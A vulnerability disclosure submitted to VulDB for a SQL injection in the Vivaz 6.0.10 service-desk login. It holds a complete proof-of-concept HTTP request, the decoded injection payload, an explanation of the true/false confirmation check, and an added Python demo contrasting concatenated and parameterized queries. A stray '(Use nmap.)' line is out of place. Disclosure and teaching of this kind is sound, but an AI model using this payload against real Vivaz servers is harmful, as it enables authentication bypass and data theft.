Submit #493482: Pix Software Vivaz 6.0.10 SQL Injection

Title: Pix Software Vivaz 6.0.10 SQL Injection
Description:

Product: Vivaz 6.0.10
Vendor: Pix Software, https://www.pixsoft.com.br/vivaz-software-service-desk.htm
Vulnerability Type: SQL Injection (Boolean-Based Blind)
Affected Endpoint: /servlet?act=login (POST request)
Vulnerable Parameter: usuario
Severity: Critical

A critical SQL injection vulnerability was discovered in the authentication endpoint of Pix Software's Vivaz 6.0.10. The usuario parameter is not properly sanitized before it reaches the database query, so an attacker can alter the logic of the SQL statement. This can lead to unauthorized access, data exfiltration, or further exploitation of the application's database.

PoC:

Login page: https://x.x.x.x/servlet?act=login&pixrnd=0125012212104825757927

POST /servlet?act=login&evento=0&pixrnd=0125012208313366528902&submit=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://x.x.x.x/
Cookie: cookie=TmpIsCookieEnabled; JSESSIONID=2667E48391FE746813F79A39B7B366E8
Content-Length: 155
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Host: x.x.x.x
Connection: Keep-alive

idIncPesqSatisfacao=1&item=1&paramUsuario=1&senha=u]H[ww6KrA9F.x-F&sistema=1&subItem=1&usuario=-1'%20OR%203*2*1=6%20AND%20000409=000409%20or%20'ZN790axZ'='

(Use nmap.)

URL-decoded, the injected usuario value is: -1' OR 3*2*1=6 AND 000409=000409 or 'ZN790axZ'='

Exploitation Details:
- The payload injected in the usuario parameter uses a Boolean-Based Blind SQL Injection technique: it verifies that the database evaluates attacker-controlled conditions such as 3*2*1=6 by observing how the application's response changes.
- The leading -1' closes the string literal the application wraps around the username, and the trailing 'ZN790axZ'=' re-opens a literal so that the application's own closing quote still produces a syntactically valid statement.
- The comparison 000409=000409 is always true, so the injected OR branch makes the WHERE clause succeed regardless of which username or password was supplied.
- If the application returns a different response when the payload is modified (e.g., replacing 3*2*1=6 with 3*2*1=7 so that the injected branch becomes false), this confirms that the injected condition is being evaluated by the database and therefore that the parameter is injectable. Comparing the two responses (status code, length, or the presence of a login error message) is the check to run before drawing any conclusion.
Impact:
An attacker can leverage this vulnerability to:
- Bypass authentication by injecting conditions that always evaluate as true.
- Enumerate the database schema by crafting time-based payloads or exploiting error-based responses.
- Extract sensitive data such as user credentials, PII (Personally Identifiable Information), or application configuration.
- Compromise the entire database, leading to data loss or manipulation.
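As an added illustration (this is not part of the submission and not Vivaz's own code), the following Python script reproduces the boolean-based check described above against an assumed login query, SELECT id FROM usuarios WHERE usuario = '...' AND senha = '...', built by string concatenation. The real Vivaz query, table and column names are unknown; the table layout, the user rows and the query are constructed here for the demonstration, using an in-memory SQLite database. The script runs the advisory's payload and its 3*2*1=7 variant through both the concatenated query and a parameterized one, so the reader can see why the two payloads differ only when the parameter is injectable.

```python
import sqlite3

# Constructed sample data (not from the advisory): a minimal user table.
SAMPLE_USERS = [(1, "admin", "S3cret!"), (2, "alice", "hunter2")]

# Payload taken verbatim (URL-decoded) from the advisory's PoC request,
# and the "false" variant the advisory suggests for confirmation.
PAYLOAD_TRUE = "-1' OR 3*2*1=6 AND 000409=000409 or 'ZN790axZ'='"
PAYLOAD_FALSE = "-1' OR 3*2*1=7 AND 000409=000409 or 'ZN790axZ'='"


def _fresh_db():
    """Build an in-memory SQLite database holding the constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE usuarios (id INTEGER PRIMARY KEY, usuario TEXT, senha TEXT)"
    )
    conn.executemany("INSERT INTO usuarios VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(usuario, senha):
    """Hypothetical login check that concatenates user input into the SQL.

    With the advisory's payload the WHERE clause becomes
        usuario = '-1' OR 3*2*1=6 AND 000409=000409 or 'ZN790axZ'='' AND senha = '...'
    Because AND binds tighter than OR, the middle branch (3*2*1=6 AND 409=409)
    is evaluated on its own and, being true, matches every row.
    Returns the list of matched user ids.
    """
    query = (
        "SELECT id FROM usuarios WHERE usuario = '%s' AND senha = '%s'"
        % (usuario, senha)
    )
    return [row[0] for row in _fresh_db().execute(query)]


def login_fixed(usuario, senha):
    """Same check with bound parameters: the payload is just a literal string."""
    query = "SELECT id FROM usuarios WHERE usuario = ? AND senha = ?"
    return [row[0] for row in _fresh_db().execute(query, (usuario, senha))]


def boolean_oracle(login):
    """The advisory's confirmation step: do the TRUE and FALSE payloads
    produce different results? True means the parameter is injectable."""
    # Password value is arbitrary; the injected OR branch decides the outcome.
    return login(PAYLOAD_TRUE, "x") != login(PAYLOAD_FALSE, "x")


if __name__ == "__main__":
    print("vulnerable, TRUE payload :", login_vulnerable(PAYLOAD_TRUE, "x"))
    print("vulnerable, FALSE payload:", login_vulnerable(PAYLOAD_FALSE, "x"))
    print("fixed, TRUE payload      :", login_fixed(PAYLOAD_TRUE, "x"))
    print("injectable (vulnerable)  :", boolean_oracle(login_vulnerable))
    print("injectable (fixed)       :", boolean_oracle(login_fixed))
```

Against the concatenated query the true payload returns every user id (an authentication bypass: the application only needs one matching row) while the false variant returns nothing; against the parameterized query both return nothing, which is exactly the difference the advisory's confirmation step relies on.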
Source: https://www.pixsoft.com.br/vivaz-software-service-desk.htm
User: Stux (UID 40142)
Submission: 02/01/2025 04:34 PM
Moderation: 02/10/2025 08:42 AM (9 days later)
Status: Accepted
VulDB entry: 295060 [Pix Software Vivaz 6.0.10 /servlet?act=login usuario sql injection]
Points: 17
